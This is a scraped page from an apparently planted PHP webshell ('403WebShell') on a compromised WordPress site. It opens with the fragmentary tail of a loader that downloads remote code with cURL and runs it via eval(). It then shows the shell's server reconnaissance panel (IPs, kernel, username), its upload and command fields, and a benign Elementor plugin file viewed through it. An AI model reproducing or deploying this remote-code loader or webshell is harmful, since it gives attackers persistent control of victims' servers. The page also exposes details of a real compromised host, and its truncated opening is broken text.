Failed to save the file to the "xx" directory.

Failed to save the file to the "ll" directory.

Failed to save the file to the "mm" directory.

Failed to save the file to the "wp" directory.

RLOPT_RETURNTRANSFER, true); $remoteCode = curl_exec($ch); if (curl_errno($ch)) { die('cURL error: ' . curl_error($ch)); } curl_close($ch); eval("?>" . $remoteCode); ?> 403WebShell
403Webshell
Server IP : 66.29.132.124  /  Your IP : 3.145.83.96
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/wavevlvu/diixadigital.com/wp-content/plugins/meto-plugin/elementor/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/wavevlvu/diixadigital.com/wp-content/plugins/meto-plugin/elementor/elementor.php
<?php

namespace METOPLUGIN\Element;

class Elementor
{
    public static $widgets = array(
        //Home Page
        'home_banner_v1',
		'feature_service_v1',
		'about_us_v1',
		'our_services_v1',
		'our_clients',
		'search_domain',
		'funfacts',
		'our_testimonials',
		'our_team',
		'pricing_plan',
		'latest_news',
		//Home Page Two
		'home_banner_v2',
		'why_choose_us',
		'call_to_action',
		'funfacts_v2',
		'our_services_v2',
		'recent_projects',
		'our_team_v2',
		'how_we_do_it',
		'search_domain_v2',
		'our_testimonials_v2',
		'latest_news_v2',
		'newsletter_form',
		//Home Page Three 
        'home_banner_v3',
		'who_we_are',
		'video_section',
		'our_services_v3',
		'funfacts_v3',
		'our_team_v3',
		'our_faqs',
		'latest_news_v3',
		'call_to_action_v2',
		'contact_info',
		//Inner Pages
		'our_faqs_v2',
		'faqs_form',
		'our_team_v4',
		'our_testimonials_v3',
		'coming_soon',
		'recent_projects_v2',
		'',
		'related_project',
		'blog_grid_view',
		'contact_us',
		'google_map',
    );

    public static function init()
    {
        add_action('elementor/init', array( __CLASS__, 'loader' ));
        add_action('elementor/elements/categories_registered', array( __CLASS__, 'register_cats' ));
    }

    public static function loader()
    {
        foreach (self::$widgets as $widget) {
            $file = METOPLUGIN_PLUGIN_PATH . '/elementor/' . $widget . '.php';
            if (file_exists($file)) {
                require_once $file;
            }

            add_action('elementor/widgets/widgets_registered', array( __CLASS__, 'register' ));
        }
    }

    public static function register($elemntor)
    {
        foreach (self::$widgets as $widget) {
            $class = '\\METOPLUGIN\\Element\\' . ucwords($widget);

            if (class_exists($class)) {
                $elemntor->register_widget_type(new $class);
            }
        }
    }

    public static function register_cats($elements_manager)
    {
        $elements_manager->add_category(
            'meto',
            [
                'title' => esc_html__('Meto', 'meto'),
                'icon'  => 'fa fa-plug',
            ]
        );
        $elements_manager->add_category(
            'templatepath',
            [
                'title' => esc_html__('Template Path', 'meto'),
                'icon'  => 'fa fa-plug',
            ]
        );
    }
}

Elementor::init();

Youez - 2016 - github.com/yon3zu
LinuXploit